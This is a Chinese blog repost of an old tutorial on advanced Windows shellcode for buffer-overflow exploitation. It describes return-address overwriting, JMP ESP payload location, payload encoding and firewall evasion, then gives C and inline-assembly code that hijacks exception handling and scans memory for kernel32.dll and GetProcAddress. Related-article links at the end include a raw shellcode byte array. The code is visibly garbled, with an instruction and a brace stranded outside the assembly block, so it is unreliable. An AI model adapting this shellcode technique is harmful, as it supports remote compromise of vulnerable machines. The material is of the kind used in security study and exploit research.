windows下shellcode高级编程

最新推荐文章于 2024-05-24 09:36:37 发布
最新推荐文章于 2024-05-24 09:36:37 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: 网络安全类 文章标签: windows 编程 api unix 数据结构 web服务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Civet148/article/details/562104
版权
windows下shellcode高级编程
黑森林 发表于 2005-10-29 22:26:00

网上关于Shellcode的文章不少,但对于windows环境下的讨论不是很多,经典的就更少了,这一篇应该不错,推荐给大家!(站长:黑森林整理)                    
unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比较简单。但WINDOWS系统往往不提供登陆服务,所以溢出攻击的SHELLCODE往往要提供SOCKET连接,要加载程序得到SHELL等,而WINDOWS的系统调用int2e接口又不如unix系统调用int80规范,所以一般都使用API,而API函数地址又因为系统版本的不同而不一样,所以要编写WINDOWS下面比较实用、通用点的SHELLCODE比较麻烦。

经过一段时间的思考,得到了WINDOWS下编写SHELLCODE的比教好的办法。
1、溢出点确定。使用溢出点附近覆盖一片一个RET指令地址的办法,这样只要知道溢出点大致范围就可以了。
2、SHELLCODE定位。使用ESP寄存器定位,只要前面那覆盖的RET地址后面放一个JMP ESP功能的指令地址就可以定位了。
3、RET指令地址、JMP ESP功能指令地址采用代码页里面的地址,54 C3,或者FF E4 、C3这个一个语言的WINDOWS地址固定,也很好找这个地址。

4、SHELLCODE直接使用C语言编写,方便编写、修改、调试。

5、SHELLCODE统一编码,满足应用条件对SHELLCODE字符的限制,用一段小汇编代码解码,这样编写SHELLCODE就可以不用考虑特殊字符了。
6、通信加密,对付防火墙,实现FTP功能,实现内存直接接管WEB服务等的高级应用。

下面主要介绍介绍编写通用SHELLCODE的办法。主要SHELLCODE里面使用的API自己用GetProcAddress定位,要使用库用LoadLibraryA加载。那这样SHELLCODE就只依靠这两个API了。那这两个API的地址又怎么解决呢,LoadLibraryA这个API在系统库KERNEL32.DLL里面,也可以使用GetProcAddress得到。那关键就是要找到系统库kernel32.dll和GetProcAddress的地址了。因为一般应用程序都会加载kernel32.dll,所以解决办法就是在
内存里面找到这个系统库和API地址,所幸知道了WINDOWS的模块数据结构也就不难了,主要是增加异常结构处理 。下面是VC6.0程序代码:

void shellcodefn()
{
int *except[3];
FARPROC procgetadd=0;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle;
_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
/* 保存异常结构链和修改异常结构链,SHELLCODE接管异常 */

imgbase=0x77e00000;
/* 搜索KERNEL32.DLL 的起始其实地址 */

call getexceptretadd
}
/* 得到异常后的返回地址 */
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
/* 模块地址是64K为单位,加快速度*/
if(imgbase==0x78000000) imgbase=0xbff00000;
/* 如果到这还没有搜索到,那可能是WIN9X系统 */
if(*( WORD *)imgbase=='ZM'&& *(WORD *)
(imgbase+*(int *)(imgbase+0x3c))=='EP'){
/* 模块结构的模块头 */
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
/* 模块名 */
libhandle=imgbase;
/* 得到模块头地址,就是模块句柄 */
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
/* 引出名 */
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
/* API地址 */
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
// 注意这儿处理了搜索页面不在情况。

_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
/* 恢复异常结构链 */


if(procgetadd==0) goto die ;
/* 如果没找到GetProcAddress地址死循环 */
die: goto die ;

_asm{

getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
/* 得到异常后的返回地址,并填写到异常处理模块 */

/* 异常处理模块 */
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
/* 修改异常返回EIP指针 */
xor eax,eax //2
/* 不提示异常 */
ret //1
/* 异常处理返回 */
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
}
}

Civet148
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
Study_shellcode:windows平台下功能性shellcode的编写
04-29
windows平台下功能性shellcode的编写 包含了5个类型的test例子,不知道从哪里下载的。 例子可能比较老,在win7,win10上可能无法成功执行,新系统的安全性比较高,最佳的环境是在XP。 补充以下不错的入门教程 Windows平台shellcode开发入门(一) Windows平台shellcode开发入门(二) Windows平台shellcode开发入门(三)
WINDOWSSHELLCODE编写高级技巧
老鬼的专栏
07-30 1567
WINDOWSSHELLCODE编写高级技巧   作者:yuange (mailto:yuange@nsfocus.com) 主页:http://www.nsfocus.com/       unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出 再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比 较简单。但WINDO
编写windowsshellcode
qq_41224661的博客
06-04 200
windowsshellcode在很长时间是一件秘密的事。问题是,它不像Unixshellcode, 你没有已知的系统调用API。而是,进程要加载函数指针到外部函数,比如CreateProcess或者ReadFile到内存的不同地方。
Windows Shellcode开发[2]
weixin_41487541的博客
03-24 4519
0 前言 在这部分我们将了解正确编写Windows系统shellcode所需的信息:进程环境块和PE文件格式。上一部分在这里:Windows Shellcode开发[1] 1 进程环境块 在Windows操作系统中,PEB作为一种结构可以用于内存中固定地址的每个进程。此结构包含进程相关信息,如:可执行文件加载到内存中的地址、模块列表(DLL)、指定进程是否在调试等。在不同版本的Windows系统中,PEB各字段偏移可能会随之改变。 由于地址空间布局随机化(ASLR),DLL将被加载到不同的内存地址,
windows平台下功能性shellcode的编写
11-12
windows平台下功能性shellcode的编写,通过高级语言编写shellcode
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
C++是一种高级编程语言,它可以生成汇编级别的代码,并且在Windows开发中广泛使用,特别是因为它与Microsoft Visual Studio IDE紧密集成。Visual Studio提供了一个强大的开发环境,支持调试、代码编辑和项目管理,...
fments_Windows编程_
10-04
Windows编程领域,"注入payload到进程"是一个高级技术,常用于系统调试、安全分析以及恶意软件的行为。这里,我们主要探讨如何实现这个过程,并理解其中涉及的关键知识点。 首先,让我们明确“payload”是什么。...
Windows 10_X64环境shellcode编写
Anansi的博客
11-20 2171
环境 windows 10_x64 windbg_x64 x64dbg nasm 适用于 VS 2017 的 x64 本机工具命令提示(安装visual studio会自带) redasm shellcode shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言/汇编编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 虽然现在的操
所有windows可用shellcode
osummertime的博客
04-12 2036
引用#include "stdafx.h" #include <windows.h> #include<Tlhelp32.h> unsigned char shellcode[] = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" "\xB1\x18\x33\xFF\x33\x
探索ShellcodeStdio:打造可调试的Windows平台Shellcode框架
gitblog_00012的博客
05-21 371
探索ShellcodeStdio:打造可调试的Windows平台Shellcode框架 ShellcodeStdioAn extensible framework for easily writing compiler optimized position independent x86 / x64 shellcode for windows platforms.项目地址:https://git...
探索Windows平台下的Shellcode生成新境界 —— ShellCodeFrame
最新发布
gitblog_00007的博客
05-24 367
探索Windows平台下的Shellcode生成新境界 —— ShellCodeFrame 项目地址:https://gitcode.com/TonyChen56/ShellCodeFrame 在信息安全领域,Shellcode扮演着至关重要的角色,它是攻击者利用漏洞实施控制目标系统的关键代码。然而,传统的Shellcode编写需要深入的汇编知识,让许多开发者望而却步。现在,我们有幸发现了一款基于...
Windows Shellcode开发[1]
weixin_41487541的博客
03-24 512
0 前言 本文包含对shellcode开发技术及其特点的概述,了解了这些概念我们就可以编写自己的shellcode,而且我们还可以修改现有漏洞的shellcode来执行我们自定义的功能。 1 Shellcode介绍 维基百科中对shellcoed的介绍: “在计算机安全中,shellcode 是一小段代码,用作利用软件漏洞的有效载荷。之所以称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从中控制受感染的机器,但任何执行类似任务的代码都可以称为 shellcode……She
windowsshellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
Windowsshellcode 编写
aptx4869_li的博客
06-16 2035
Windows下的shellcode的编写首先,我们先了解一下shellcode是什么?Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数...
windows shellcode 总结
weixin_34267123的博客
12-03 245
说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很少有人提及,今天我们就从以下几个方面来对windows下的shellcode做一个全剖析: 1. shellcode的发展历史以及定义 2. 现今常见的windows下的shellcode种类 3. 编写shellcode流程 4. shellocode举例 5、shell...
【移动安全高级篇】————3、Android系统ShellCode编写
Fly_鹏程万里
01-10 1727
随着Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode的编写。本文将以提出问题、解决问题的方式教你如何编写Android系统shellcode。由于篇幅限制,本文将不对ARM指令集进行介绍,建议没有基础的读者先参考相关手册。 基础部分 使用什么工具? GNU ARM汇编器as和GNU ARM连接器ld是编写Androi...
Windows缓冲区溢出编程入门教程
本书采用轻松幽默的风格,深入浅出地介绍了Windows下缓冲区溢出编程的基本概念和技术。书中避免了复杂的汇编代码和系统结构的深入解析,使得学习过程更加有趣。 第一章介绍了Windows下堆栈溢出的基本概念,包括缓冲...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值